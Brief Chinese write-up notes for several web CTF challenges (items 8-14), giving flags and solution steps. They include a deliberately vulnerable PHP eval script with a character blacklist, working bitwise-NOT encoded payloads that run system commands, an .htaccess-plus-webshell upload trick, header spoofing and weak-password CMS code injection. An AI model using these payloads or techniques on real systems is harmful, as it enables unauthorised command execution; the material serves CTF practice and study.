8, [NISACTF 2022]easyssrf
跨目录读取
NSSCTF{c42d6e04-f7cb-4ac4-925b-efd9b90c76ff}
9, [SWPUCTF 2021 新生赛]hardrce
<?php
header("Content-Type:text/html;charset=utf-8");
error_reporting(0);
highlight_file(__FILE__);
if(isset($_GET['wllm']))
{$wllm = $_GET['wllm'];$blacklist = [' ','\t','\r','\n','\+','\[','\^','\]','\"','\-','\$','\*','\?','\<','\>','\=','\`',];foreach ($blacklist as $blackitem){if (preg_match('/' . $blackitem . '/m', $wllm)) {die("LTLT说不能用这些奇奇怪怪的符号哦!");}}
if(preg_match('/[a-zA-Z]/is',$wllm))
{die("Ra's Al Ghul说不能用字母哦!");
}
echo "NoVic4说:不错哦小伙子,可你能拿到flag吗?";
eval($wllm);
}
else
{echo "蔡总说:注意审题!!!";
}
?>
从源码可以看到所有字母字符和某些特殊字符被过滤;但源码中可以使用GET方式以wllm为参传值,且源码里面含有eval函数可以执行命令;结合上面要求,可以使用url取反方式进行绕过,不用异或和或运算是因为^和`被过滤了。 使用脚本将system和ls /进行url编码取反,可以找到根有个flllllaaaaaaggggggg文件;wllm=(%8c%86%8c%8b%9a%92)(%93%8c%df%d0);
将cat /flllllaaaaaaggggggg也进行url编码取反,可以取到flag。wllm=(%8c%86%8c%8b%9a%92)(%9c%9e%8b%df%d0%99%93%93%93%93%93%9e%9e%9e%9e%9e%9e%98%98%98%98%98%98%98);
NSSCTF{e630a879-faa9-428b-8c86-d8ced2e12fa3}
10, [SWPUCTF 2021 新生赛]easyupload3.0
上传htaccess文件
再上传jpg文件,然后用蚁剑连接,在根目录下找到flag
11, [UUCTF 2022 新生赛]websign
用插件禁用js,查看源码
12, [LitCTF 2023]Http pro max plus
用x-forwarded-for,不行换一种
client-ip: 127.0.0.1
请求头写 referer: pornhub.com
user-agent: Chrome
f12查看
13, [SWPUCTF 2022 新生赛]numgame
通过源码找到目录位置,进行访问
/hint2.php 可以直接访问
call_user_func():把第一个参数作为回调函数调用
preg_match(“/n|c/m”,$_GET[‘p’], $matches):过滤字符n和c,\m模式是多行匹配。由于PHP语言本身不区分大小写,故这里可以大小写绕过。
p=Nss2::Ctf
p[]=nss2&p[]=ctf
14, [GKCTF 2021]easycms
用dirb扫到一个 admin.php
用弱口令进去admin 12345
创建幻灯片,在里面写入php代码
设计——自定义——首页——编辑,选择php源代码
让先创建一个文件
设计——组件——素材库——上传素材
随便上传一个txt文件,然后将名字改为
然后回去编辑php代码
然后返回网址首页得到flag